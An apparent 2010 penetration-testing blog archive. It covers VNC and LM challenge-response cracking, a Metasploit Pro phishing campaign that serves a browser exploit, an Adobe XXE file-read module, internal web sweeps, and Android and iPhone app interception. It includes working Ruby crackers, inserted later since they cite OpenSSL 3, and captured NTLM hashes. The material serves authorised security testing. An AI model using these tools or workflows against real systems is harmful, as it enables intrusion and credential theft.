Friday, December 17, 2010

Metasploit and VNC Password Bruteforcing

You probably missed it, but jduck recently snuck a VNC mixin and a vnc_login module into the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

It's tedious to guess passwords by hand like this.

Instead, let's use the Metasploit module

and throw a dictionary attack against the VNC server.

Looks like the VNC no-auth module has been ported and stuck in there too :-)
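For anyone who wants to see what vnc_login is actually doing on the wire, here is the check itself as an added example (it is not the module's or the mixin's code): RFB "VNC Authentication" in plain Ruby using the stdlib OpenSSL bindings, plus an offline check of a captured challenge/response against a wordlist. The challenge bytes and the wordlist are constructed for the demo. The two things worth knowing before you throw a dictionary at VNC are in the comments: the password is truncated to 8 bytes, and the DES key bytes are bit-reversed.

```ruby
require 'openssl'

# RFB 3.x "VNC Authentication": the server sends a 16-byte random challenge, the
# client DES-encrypts it with a key derived from the password and returns the
# 16-byte result. Two quirks matter when bruteforcing:
#   1. the password is truncated to 8 bytes and NUL-padded, so "password1" and
#      "passwordXYZ" are the same credential as "password";
#   2. VNC uses each key byte with its bits reversed (a historical quirk), and
#      DES ignores the low bit of every key byte, so there are at most 56
#      effective key bits.

# Reverse the bit order of one byte: 0b00000001 -> 0b10000000.
def reverse_bits(b)
  b.to_s(2).rjust(8, '0').reverse.to_i(2)
end

# Derive the 8-byte DES key VNC uses for a password.
def vnc_des_key(password)
  key = password.b[0, 8].ljust(8, "\x00")
  key.bytes.map { |b| reverse_bits(b) }.pack('C*')
end

# Single DES in ECB mode. Done as 3DES with K1=K2=K3 (mathematically identical)
# because OpenSSL 3 ships plain "des-ecb" only in the legacy provider.
def des_ecb(key8, data)
  c = OpenSSL::Cipher.new('des-ede3')
  c.encrypt
  c.padding = 0
  c.key = key8 * 3
  c.update(data) + c.final
end

# What a VNC client sends back for a given password and challenge.
def vnc_auth_response(password, challenge)
  raise ArgumentError, 'challenge must be 16 bytes' unless challenge.bytesize == 16
  des_ecb(vnc_des_key(password), challenge)
end

# Offline dictionary check of a captured challenge/response pair. Candidates are
# deduplicated on their first 8 bytes since anything beyond that is ignored.
# Returns the (truncated) password that matches, or nil.
def crack_vnc(challenge, response, wordlist)
  tried = {}
  wordlist.each do |word|
    cand = word.b[0, 8]
    next if tried[cand]
    tried[cand] = true
    return cand if vnc_auth_response(cand, challenge) == response
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  # Constructed demo data: a fixed challenge and a response we compute ourselves.
  challenge = (1..16).to_a.pack('C*')
  response = vnc_auth_response('password', challenge)
  puts "response: #{response.unpack1('H*')}"
  puts "cracked:  #{crack_vnc(challenge, response, %w[letmein secret password123]).inspect}"
end
```

The practical consequence for a dictionary attack: trim every word to 8 characters and dedupe before you start, since vnc_login (or anything else) gains nothing from trying "password1", "password2" and "password!" separately.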


Thursday, December 16, 2010

Conducting a Phishing Campaign in Metasploit Pro

So the new job gets me new fun toys. Figured I'd try the fancy shmancy tools and do a phishing campaign with Metasploit Pro.

1. Click on Campaigns and start filling stuff out, like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when it's all filled out. To start, click the Start Campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess this is what the email could look like if you weren't trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. My only gripe is the lack of configuration options in the exploit payload section. I've been told this will be addressed shortly; even though a lot of work has been put into smart defaults, the ability to change them when necessary would be nice.


Tuesday, November 23, 2010

iPhone + Burp

This is one of those things that is super simple and I figure most folks have already done it or know how to do it. There may be a few people out there whose time I save with this post. Who knows. Let's get on with it.

Just as with the Droid apps, when an untrusted certificate (Burp's) shows up for an app that requires SSL/TLS, the app crashes and burns. The best way (same as on the Droid) to fix this is to import Burp's CA as a trusted Certificate Authority (CA).

Why would we want to do this? Apps on mobile phones are cool but some would argue the web-services the apps are communicating with can be even juicier. We'd like to intercept the communication to the web-services and play around a bit.

You'll need to export the Burp certificate. I usually open Firefox, set the browser to run through Burp, view the certificate, and export it. Much like this...

Browse to (while proxying through Burp)

"Get Certificate"

Select PortSwigger's cert

Save the certificate with a .cer extension (.cer is what the iPhone recognizes)

Start a web server to host PortSwiggerCA.cer

On the iPhone, browse to the location of the PortSwiggerCA.cer file

The iPhone detects the .cer and asks you to install it as a CA; do it :-)

WiFi configuration: click the blue arrow on the right of your network,

then configure the HTTP proxy with Burp's IP and port.

Hopefully that was easy enough to follow along. Now you can proxy your iPhone apps through Burp.

~Happy Hacking

Monday, November 22, 2010

wXf Videos from AppSec DC 2010

Here are some of the videos from AppSec DC 2010 and our presentation (Seth Law, Chris Gates and I) on wXf (Web Exploitation Framework).

Background: Back in March of this year, Seth approached me with the idea of creating a framework that would let us put all of our scattered scripts together. Then we decided "our" could mean the AppSec community as a whole. Why not take everyone's one-off scripts, proof-of-concept tools and ideas and centralize them? So... we've worked off and on since March to build it.

The only frameworks available to us at the time (and even now) which were web-centric had user interfaces that weren't what we were looking for, broke after updates and/or at random, or just didn't have the HTTP libs we needed (SOAP, JSON, Flex, etc.).

So the first thing we focused on was the console interface. We figure this will probably be the interface with the most mileage. At the moment, we are still working on the console interface as well as improving the core. The framework won't be perfect from day one but we'd like to make it as easy to use as possible.

We decided Metasploit is possibly the best designed piece of open source software/framework that we've seen, and it works incredibly well. People are familiar with it and it looks nice. So we decided to make wXfconsole look like msfconsole: the same *general* type of commands and interface layout.

Release will occur in the next couple of months. We have a list of people to "beta-test" the software and want to ensure we limit the amount of bugs to a minimum upon release.

Now, for the videos.

User Agent Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Directory Traversal Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Web Server Stack by Seth Law from cktricky on Vimeo.

Monday, November 8, 2010

Tethering Your Droid to a Linux System

Imagine my happiness when I got the Droid update and saw USB tethering available.

Then imagine my sadness, then rage, when VendorX wanted to charge another 15 bucks to tether.

So following the instructions from here, it is possible to tether via USB on Linux. Evidently PDAnet works great, but I don't use Windows except for PowerPoint, and I can't afford a Mac.

So here's how to get it going if you don't want to click the "I'll never remember that" URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on Android USB debugging: Applications → Development → USB debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

Set your Firefox network settings to use a proxy at localhost port 8080 (adb forwards that to the port Proxoid listens on) and you can surf. You should also be able to send your whole system through the Droid if you set the system-wide network proxy.

Saturday, November 6, 2010

Adobe XML Injection Metasploit Module

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple Adobe products, including BlazeDS 3.2 and earlier, LiveCycle 9.0, 8.2.1 and 8.0.1, LiveCycle Data Services 3.0, 2.6.1 and 2.5.1, Flex Data Services 2.0.1, and ColdFusion 9.0, 8.0.1, 8.0 and 7.0.2.

References Here:

I recommend you read Security-Assessment.com's PDF on it; it's good.

Anyway, it's a cool bug:
1 --> it affects several products, although most people have probably never heard of any of them except ColdFusion.
2 --> the vulnerable gateway is enabled by default in all of those products you've never heard of (ColdFusion generally excepted, although CF 8 appears to have it turned on by default).
3 --> you have to apply the ColdFusion patches individually; there is no automated process. Since this vuln got little media attention, I've seen a lot of hosts that are still missing the patch and/or didn't turn off the vulnerable service.

On with the demo!

Against a patched host, or one where the service has been disabled in ColdFusion, you'll see one of two things: either 404s for the checks, or a 200 for /flex2gateway/ and a 500 for the http or https check.

If you get a bunch of 400s then you need to set VHOST.

When it works, you'll see something like this for /etc/passwd

and like this when you ask for a file that doesn't exist or that the server doesn't have permission to read (since CF doesn't run as root on Linux, requesting /etc/shadow won't work) :-(

At this point you're probably thinking "so what?" Well, what's cool about an arbitrary file read is that 1. it also works on Windows:

and 2. that whole attack is now cool again, because you can just request that file too.


Friday, October 8, 2010

A new definition of "win"

Ben Tomhave has a good post over on his blog.

Go read it. It's short... won't take long, I promise.

In part I agree: you are never going to "win" by keeping an attacker out. Like he puts it in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one Adobe/Flash/Java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB, where if I'm still breathing and have use of my limbs at the end of it I can call that a "win". In turn, it's not a successful penetration test or attack if I merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). It's a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenshots of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case, while the business may have thought they "survived", they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies, and conditioning them that this is a "win", when in fact most times defenders fail to see and catch people with a modified methodology, non-public tools, or "non-standard" goals.

Monday, September 27, 2010

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First impressions... skinny book. Strike one. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and makes no mention of Maltego. I'm not sure how anyone can write a book on intelligence gathering and NOT include Maltego. Strike two.

At this point I was thinking I had a dud on my hands, BUT Chapter 2 -- "Inside-Out Attacks: The Attacker Is the Insider" redeems it. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS Shell for XSS exploitation instead of BeEF, which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good. None of the others are as technical as Chapter 2, but I believe they cover the current trends in an entertaining and readable way. Like one reviewer mentioned, the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high-level "possible" attacks versus any "probable" attacks, with the exception of possibly making insecure VMs and getting people to run them. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors' talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing together vulnerabilities that would be/were not considered high risk into high-risk issues by combining one or more of them, which actually is "next generation".

Chapter 3, IMO, didn't cover anything new: mostly a discussion of insecure protocols, ARP spoofing and email spoofing. While still a relevant issue in security, it is not "next generation".


Thursday, September 23, 2010

AppSec DC 2010 and Web Exploitation Framework

Back in March, I spoke of inactivity on this blog because of time being devoted to a new tool.

The post can be found Here :

The tool is actually a combination of tools or Web Exploitation Framework (wXf). The idea is to roll the massive amounts of various AppSec tools into a single framework. Simplifies things, we hope.

Come November 10th, at AppSec DC 2010 we will be presenting the framework and laying out a road-map. I hope it becomes useful to consultants and application security practitioners.

More info can be found at the following link (full schedule):


...and here (wXf Specific):


Look forward to seeing you all there.

~Happy Hacking


Saturday, September 4, 2010

Grabbing Index Pages Of Webservers

Grabbing the index pages of web servers seems like a no-brainer and something every pentester is going to perform on a test. The problem I ran into is how to get this info once you're inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host, or to set up a route via your meterpreter session and run some sort of auxiliary module. You can TCP port scan and find open ports, or use the http_version module to see the server version, but you don't get a feel for what's actually on the site.

I opted to write something that would scan a range, perform an HTTP GET of / on each IP, then take the resulting body from the response, which should be HTML, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS
msf auxiliary(http_index_grabber) > run

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[*] Received 301 to for
[-] Received 403 for
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[*] Received 302 to for
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[*] Received 302 to for

you can then check out the folder with the results

code is here:
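Since the link to the module's code did not survive, here is the same idea as a stand-alone Ruby script (an added example written for this page, not the http_index_grabber module itself): sweep a range, GET / from each host, log 200 bodies to disk, and report redirects and 403s in the same one-line style the module prints. It uses only the stdlib; to run it through a meterpreter pivot you'd point it at a portfwd or socks proxy, which is outside what the script does. The sample responses it is checked against are constructed.

```ruby
require 'net/http'
require 'openssl'
require 'ipaddr'
require 'fileutils'
require 'tmpdir'

# Decide what to do with one host's answer to "GET /" and return the status line
# to print. 200 bodies are written to <logdir>/<ip>.html for later review;
# redirects report where they point, since that is often the real app.
def record_index(ip, resp, logdir)
  code = resp.code.to_i
  case code
  when 200
    FileUtils.mkdir_p(logdir)
    path = File.join(logdir, "#{ip}.html")
    File.binwrite(path, resp.body.to_s)
    "[+] #{ip} HTTP 200, logged to #{path}"
  when 301, 302, 303, 307, 308
    "[*] #{ip} HTTP #{code} to #{resp['Location']}"
  when 401, 403
    "[-] #{ip} HTTP #{code}"
  else
    "[*] #{ip} HTTP #{code}"
  end
end

# Expand a CIDR block (or a single address) into the list of IPs to visit.
def expand_hosts(spec)
  IPAddr.new(spec).to_range.map(&:to_s)
end

# Fetch / from one host with short timeouts; connection errors are reported in
# the same one-line style instead of aborting the sweep.
def grab_index(ip, port, logdir, use_ssl: false, timeout: 5)
  http = Net::HTTP.new(ip, port)
  http.use_ssl = use_ssl
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE if use_ssl # internal boxes: self-signed certs
  http.open_timeout = timeout
  http.read_timeout = timeout
  resp = http.request(Net::HTTP::Get.new('/', 'Host' => ip))
  record_index(ip, resp, logdir)
rescue SystemCallError, SocketError, IOError, Timeout::Error,
       OpenSSL::SSL::SSLError, Net::ProtocolError => e
  "[-] #{ip}:#{port} #{e.class}"
end

# Sweep a range; returns one status line per host so the caller can print or save them.
def grab_range(spec, port = 80, logdir = File.join(Dir.tmpdir, 'http_index_grabber'), use_ssl: false)
  expand_hosts(spec).map { |ip| grab_index(ip, port, logdir, use_ssl: use_ssl) }
end

if __FILE__ == $PROGRAM_NAME && ARGV[0]
  # e.g. ruby grabber.rb 10.10.10.0/24 80
  puts grab_range(ARGV[0], (ARGV[1] || 80).to_i)
end
```

The Host header is set to the IP on purpose: on a shared host that gets you the default vhost, which is exactly the "what is actually on this box" view the post is after. Run it a second time with the hostnames you learn from the redirects if you want the named sites too.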

Monday, August 2, 2010

Scanning IPv6 Enabled Hosts

Nmap will scan IPv6-enabled hosts if you pass it the -6 switch, but (as of 5.21) it only does TCP connect scans and no OS identification, which makes sense because OS fingerprinting relies on nuances of the IPv4 stack's responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

carnal0wnage ~: nmap -6 -sV ::ffff:

Starting Nmap 5.21 ( ) at 2010-03-19 21:00 UTC
Nmap scan report for ::ffff:
Host is up (0.024s latency).
Not shown: 795 closed ports, 203 filtered ports
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.9)
8080/tcp open http-proxy Squid webproxy 2.6.STABLE16

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

and Metasploit supports IPv6 too:

msf auxiliary(http_version) > run

[*] 2002:53e9:a52a:0000:0000:0832:3316:5042 is running nginx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Wednesday, July 28, 2010

Scapy, Traceroute and Pretty Pictures

Much, much more is available in the documentation,

but here is how to make a cool traceroute graph from you to another host.


Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
Received 18 packets, got 18 answers, remaining 2 packets
1 11
2 11
3 11
4 11
5 11
6 11
7 11
8 11
9 11
10 11
11 11
14 SA
15 SA
16 SA
17 SA
18 SA
19 SA
20 SA
>>> res.graph(target="> /tmp/graph.svg")

opening up /tmp/graph.svg will give you:


Monday, July 26, 2010

Reversing Android Apps

thanks to cktricky for pointing me to:


Once you've got it installed/unzipped it's fairly easy to use. Pull your .apk from the emulator:

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)

From there simply decode the .apk:

user@dev:~/android-tutorial/reverse$ ./apktool d com.joelapenna.foursquared.apk foursquare
I: Baksmaling...
I: Loading resource table...
I: Decoding resources...
I: Loading resource table from file: /home/user/apktool/framework/1.apk
I: Copying assets and libs...

From there you should have a folder looking something like this

Inside your smali folder will be the disassembled Dalvik bytecode (smali) for every class. It isn't Java source, but it's readable enough to follow the app's logic. Have fun.

Actually, after I did the above I found this, which is a video covering the above and previous posts.

Friday, July 23, 2010

Using the Android Debug Bridge (adb)

The Android Debug Bridge (adb) has lots of useful features. It's documented here:

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb
Android Debug Bridge version 1.0.25

some of the features you may want to immediately mess with are:

listing devices

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
emulator-5554 device

getting an interactive shell on the emulator

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb shell
# ls

cat'ing useful stuff inside that shell

# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 233.47
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5
Cache type : write-through
Cache clean : not required
Cache lockdown : not supported
Cache format : Harvard
I size : 4096
I assoc : 4
I line length : 32
I sets : 32
D size : 65536
D assoc : 4
D line length : 32
D sets : 512
Hardware : Goldfish
Revision : 0000
Serial : 0000000000000000

and probably pulling things off the file system so you can reverse them:

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)

Wednesday, July 21, 2010

Accessing your android emulator on the command line

A poster on one of the other Android posts mentioned you can just telnet into the emulator's console if you've got the emulator running.

It's easy to do and the preferred way if you just want to script events. Just telnet to localhost port 5554 (the console port of the first emulator instance) and you can issue emulator commands.

user@dev:~$ telnet localhost 5554
Trying ::1...
Connected to localhost.
Escape character is '^]'.
Android Console: type 'help' for a list of commands



Android console command help:

help|h|? print a list of commands
event simulate hardware events
geo Geo-location commands
gsm GSM related commands
kill kill the emulator instance
network manage network settings
power power related commands
quit|exit quit control session
redir manage port redirections
sms SMS related commands
avd manager virtual device state
window manage emulator window

help event
allows you to send fake hardware events to the kernel

available sub-commands:
event send send a series of events to the kernel
event types list all type aliases
event codes list all code aliases for a given type
event text simulate keystrokes from a given text


help geo
allows you to change Geo-related settings, or to send GPS NMEA sentences

available sub-commands:
geo nmea send an GPS NMEA sentence
geo fix send a simple GPS fix

you get the idea...
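If "script events" is the goal, telnet is the wrong tool; a few lines of Ruby talk to the same console. The following is an added example for this page (not the emulator's own tooling): a small client that speaks the console protocol seen above, where the banner ends with a line reading OK and every command is answered by its output followed by OK or KO: reason. The fake console it is exercised against is constructed. One assumption beyond the post: emulators released years after it require an auth command with a token from ~/.emulator_console_auth_token before anything else works, which the client handles if you pass the token.

```ruby
require 'socket'

# Tiny client for the emulator console: the protocol is line based, the banner
# ends with "OK", and every command is answered by zero or more output lines
# followed by "OK" (success) or "KO: <reason>" (failure). Newer emulators also
# require "auth <token>" first (assumption: token file is
# ~/.emulator_console_auth_token).
class EmulatorConsole
  Reply = Struct.new(:ok, :lines)

  def self.open(host = '127.0.0.1', port = 5554, auth_token: nil)
    console = new(host, port)
    console.cmd("auth #{auth_token}") if auth_token
    yield console
  ensure
    console&.close
  end

  attr_reader :banner

  def initialize(host, port)
    @sock = TCPSocket.new(host, port)
    @banner = read_reply.lines # consume the greeting up to its "OK"
  end

  # Send one console command and return its Reply.
  def cmd(line)
    @sock.write("#{line}\r\n")
    read_reply
  end

  # Two of the commands from the help listing, wrapped.
  def geo_fix(lon, lat)
    cmd("geo fix #{lon} #{lat}")
  end

  def sms_send(from, text)
    cmd("sms send #{from} #{text}")
  end

  def close
    @sock.close unless @sock.closed?
  end

  private

  # Read lines until the OK/KO terminator; a closed socket counts as failure.
  def read_reply
    lines = []
    while (l = @sock.gets)
      l = l.chomp
      return Reply.new(true, lines) if l == 'OK'
      return Reply.new(false, lines << l) if l.start_with?('KO:')
      lines << l
    end
    Reply.new(false, lines << 'connection closed')
  end
end

# Run a list of console commands in one session and return the replies in order.
def run_console_script(commands, host: '127.0.0.1', port: 5554, auth_token: nil)
  EmulatorConsole.open(host, port, auth_token: auth_token) do |c|
    commands.map { |line| c.cmd(line) }
  end
end

if __FILE__ == $PROGRAM_NAME
  # Against a running emulator: fake a GPS fix, then an incoming SMS.
  run_console_script(['geo fix -122.0840 37.4220', 'sms send 5551234 hello']).each do |r|
    puts "#{r.ok ? 'OK' : 'KO'} #{r.lines.join(' | ')}"
  end
end
```

Checking for the KO: line is the part people skip when they script this with expect or netcat, and it is the part that matters: a typo in a geo fix silently leaves the app under test with the old location.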

Tuesday, July 6, 2010

Fatal System Error Pseudo Book Review

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo book review, since it's not "really" a tech book. The book is written with very little technical jargon and is an interesting read, with a mix of information on Barrett Lyon, who fought DDoS attacks against various websites, the ties between online gambling and the mob, and a transition into the fight by Andy Crocker, a British cybercrime agent, against the Russian and Eastern Bloc carding cybercriminals. An entertaining read about the history of carding and denial-of-service attacks by Eastern Bloc criminals.

In the category of:

Masters of Deception: The Gang That Ruled Cyberspace

The Fugitive Game: Online with Kevin Mitnick

Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age

i.e. the learn-about-hacker-history type of book.


Thursday, July 1, 2010

Revisiting HALFLM Stuff

I covered some of the HALFLM challenge sniffing stuff in a previous post,

but I had to revisit it the other day for work and couldn't find the actual tables and program from the post.

so here are some updated links.

where to grab the tables:

where to grab the program:

One gotcha I ran into on the last PT was, for some reason, getting odd hashes from the SMB and NTLM sniffing modules.

In some cases the hashes were not the same for the same username and hostname; these were unusable. I also had some that had a bunch of zeros in them; those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did catch an smb_login scan, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
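Why the half-LM tables work at all is worth seeing in code, so here is the LM hash and the LM challenge-response computed from scratch in Ruby as an added example (not the sniffer modules' or the table generator's code). It shows that the first 8 bytes of the LM response over the fixed 1122334455667788 challenge depend on the first 7 uppercased characters of the password and nothing else, which is the whole trick: a table over that 7-character space recovers the first half, and the rest is a small brute force. It also shows something visible in the capture above: for passwords of 7 characters or fewer the second half of the LM hash is the constant AAD3B435B51404EE, so the last 8 bytes of the response are the same for every such password, which is what you would expect the repeated 2f85252cc731bb25 trailer on most of those lines to be. The passwords in the demo are constructed; the LM hash test vectors for the empty password and "password" are the well-known ones.

```ruby
require 'openssl'

# Single DES on one 8-byte block with an 8-byte key, done as 3DES with
# K1=K2=K3 (identical result) because OpenSSL 3 keeps plain "des-ecb" in the
# legacy provider.
def des_block(key8, block8)
  c = OpenSSL::Cipher.new('des-ede3')
  c.encrypt
  c.padding = 0
  c.key = key8 * 3
  c.update(block8) + c.final
end

# Spread 7 key bytes over 8 DES key bytes, 7 bits each (the low parity bit is
# ignored by DES). Same expansion Samba and Metasploit use.
def des_key_from_7(k7)
  b = k7.bytes
  [
    b[0] >> 1,
    ((b[0] & 0x01) << 6) | (b[1] >> 2),
    ((b[1] & 0x03) << 5) | (b[2] >> 3),
    ((b[2] & 0x07) << 4) | (b[3] >> 4),
    ((b[3] & 0x0f) << 3) | (b[4] >> 5),
    ((b[4] & 0x1f) << 2) | (b[5] >> 6),
    ((b[5] & 0x3f) << 1) | (b[6] >> 7),
    b[6] & 0x7f
  ].map { |x| (x << 1) & 0xff }.pack('C*')
end

LM_MAGIC = 'KGS!@#$%'.b
HALFLM_CHALLENGE = ['1122334455667788'].pack('H*') # the fixed challenge the sniffer modules send

# LM hash: uppercase, NUL-pad/truncate to 14 bytes, and let each 7-byte half
# encrypt the magic constant. Each half therefore depends on 7 characters only.
def lm_hash(password)
  p = password.b.upcase[0, 14].ljust(14, "\x00")
  [p[0, 7], p[7, 7]].map { |half| des_block(des_key_from_7(half), LM_MAGIC) }.join
end

# LM challenge-response (the "LM" field the sniffer logs): pad the 16-byte hash
# to 21 bytes, split into three 7-byte keys, encrypt the challenge with each.
def lm_response(password, challenge)
  key21 = lm_hash(password) + ("\x00" * 5).b
  (0..2).map { |i| des_block(des_key_from_7(key21[i * 7, 7]), challenge) }.join
end

# What a half-LM table recovers: the first 8 response bytes use hash bytes 0..6,
# i.e. the first 7 (uppercased) characters of the password, and nothing else.
def halflm_match?(first7, challenge, response)
  lm_response(first7, challenge)[0, 8] == response[0, 8]
end

def to_hex(s)
  s.unpack1('H*')
end

if __FILE__ == $PROGRAM_NAME
  %w[password passwordXYZ abc zzzzzzz].each do |pw| # constructed demo passwords
    puts "#{pw.ljust(12)} LM=#{to_hex(lm_hash(pw))} resp=#{to_hex(lm_response(pw, HALFLM_CHALLENGE))}"
  end
end
```

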